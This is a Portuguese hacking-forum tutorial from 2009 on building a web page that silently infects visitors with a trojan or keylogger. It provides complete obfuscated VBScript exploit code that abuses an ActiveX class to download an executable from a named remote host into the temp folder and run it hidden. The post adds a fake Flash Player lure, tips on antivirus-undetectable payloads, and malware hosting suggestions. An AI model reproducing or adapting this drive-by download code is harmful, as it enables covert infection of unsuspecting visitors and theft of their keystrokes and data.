Executar sua Keylogger ou Trojan em uma pagina web

Ver o tópico anterior Ver o tópico seguinte Ir em baixo

Executar sua Keylogger ou Trojan em uma pagina web

Mensagem  veronmaiden em Sab Dez 05, 2009 12:49 pm

ai voltei galera aushuasas vou fala um pouco sobre pagina web com links com trojan blz espero que goste fuiii

Criar pagina com auto-infect de keylogger

O objetivo desse tutorial é colocar seu server de um trojan ou de um keylogger em uma pagina em HTML na qual uma pessoa acessa e começa a fazer o download do server, o mais interessante é que o download começa sem ela saber que esta baixando algo.
Eu estive procurando bastante sobre o mesmo, e acredito que muitos vão achar que ''isso é faxada'' mas realmente funciona,o problema é que existe muitas técnicas, assim como essa muito antiga E QUE NÂO FUNCIONAM MAIS.Essa esta testada e aprovada.
Vamos la ?

1- Iremos precisar de 4 coisas :
a) O código Vbscript.
b) SERVER do trojan ou keylogger de conexão direta ou reversa INDETECTÀVEL pelos AVs.
c) Bloco de notas (NOTEPAD)
d)Site para hospedagem da página em html(espero que encotrem um bom)

2- Codigo Vbscript :

Código:


on error resume next
LNK1= "http://bruxinhaloira."
LNK2= "ifrance.com"
LNK3= "/flash.com"
LNK = LNK1&LNK2&LNK3
Set df = document.createElement("object")
PB1="clsid:BD96C556-65A3-11D0"
PB2="-983A-00C04FC29E36"
PPB=PB1&PB2
df.setAttribute "classid",PPB
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
ww1="Ad"
ww2="od"
ww3="b."
ww4="st"
ww5="re"
ww6="am"

Cpo01=ww1&ww2&ww3&ww4&ww5&ww6
Cpo05=Cpo01
set S = df.createobject(Cpo05,"")
S.type = 1

Cpo06="GET"
x.Open Cpo06, LNK, False
x.Send
FFILE0="flash.com"
Cpo10="Scripting"
Cpo11=".FileSystemObject"
Cpo12=Cpo10&Cpo11

'set F = df.createobject("Scripting.FileSystemObject","")
set F = df.createobject(Cpo12,"")
set tmp = F.GetSpecialFolder(2)
FFILE0= F.BuildPath(tmp,FFILE0)
S.open
S.write x.responseBody
S.savetofile FFILE0,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute FFILE0,"","","open",0

3- Copie o codigo no bloco de notas (NOTEPAD)

4- Agora vamos editar de acordo com suas preferências ( esse código já está com minhas especificações, ou seja, já ta com o endereço da minha página com o server do NYNJA SPY hospedado (FLASH.COM ). É um link que da acesso direto para download! Ex: http://www.host.com/server.exe obs: se não for um link de acesso direto não vai funcionar.

5- Vocês terão que modificar somente o trecho do código que está logo no ínicio e um perto do final do código.Lembrando que estou utilizando o meu endereço url e que voçês tambem podem utilizar se quiserem usar o Trojan NINJA-SPY, mas ele Não está totalmente indetectável.

- Notem que existe um endereço URL http://bruxinhaloira.ifrance.com/flash.com dividido em 3 links! Trecho do código abaixo:

Código:


on error resume next
LNK1= "http://bruxinhaloira." <-----------Aqui esta o endereço dividido em 3 links: ( LNK1, LNK2, LNK3 )
LNK2= "ifrance.com"
LNK3= "/flash.com"
LNK = LNK1&LNK2&LNK3 < ----------E aqui a junção dos 3 links formando:http://bruxinhaloira.ifrance.com/flash.com

6- Agora terão que modificar mais um trecho logo abaixo do anterior...
Notem que aqui está o nome do server ( flash ) mais a extensão ( .com ) : ( flash.com )


Trecho do código abaixo:

Código:

Cpo06="GET"
x.Open Cpo06, LNK, False
x.Send
FFILE0="flash.com" <----------Aqui está o nome do Server com a extensão: ( flash.com ): obs: Sem a barra
Cpo10="Scripting"
Cpo11=".FileSystemObject"
Cpo12=Cpo10&Cpo11

7- Agora o último trecho do codigo a ser modificado :
(notem que eu destaquei de preto o link do codigo a ser modificado.)

Código:

Você não possui o Flash Player instalado!

Para visualizar esta página você precisa ter o flash player instalado em seu computador.
Clique em Download agora para instalá-lo e poder visualizar


Mensagem importante: Na próxima página, talvez você tenha que clicar na barra dourada no topo de seu navegador para permitir a instalação.



8- Pronto está configurado o código no bloco de notas, agora é só salvar com com extensão .HTML
( Arquivo + salvar como )
Ex: Index.html

9- Notaram que eu deixei exposto nos exemplos o endereço URL do server NINJA-SPY ( http://bruxinhaloira.ifrance.com/flash.com ). Aqui eu utilizei esse server com extensãoo .COM, mas normalmente o servidor do ninja spy tem extensão .SCR.Tive que converter para extensão .COM porque esse site que eu hospedei http://www.ifrance.com aceita com mais facilidade arquivos com extensão .COM, mas se voçês precisarem de um site para hospedar arquivos .EXE ou outra extensão tem o http://www.poctha.ru lá voçês podem hospedar arquivos .exe ou outra extensão com link direto para download.

Obs: Alterei a extensão do servidor .SCR para .COM somente renomeado e isso não corrompeu o server mas talvez não funcione para outras extensões.

veronmaiden

Mensagens : 70
Data de inscrição : 02/08/2009

Ver perfil do usuário http://www.insecuritynet.com

Voltar ao Topo Ir em baixo

Ver o tópico anterior Ver o tópico seguinte Voltar ao Topo

- Tópicos similares

 
Permissão deste fórum:
Você não pode responder aos tópicos neste fórum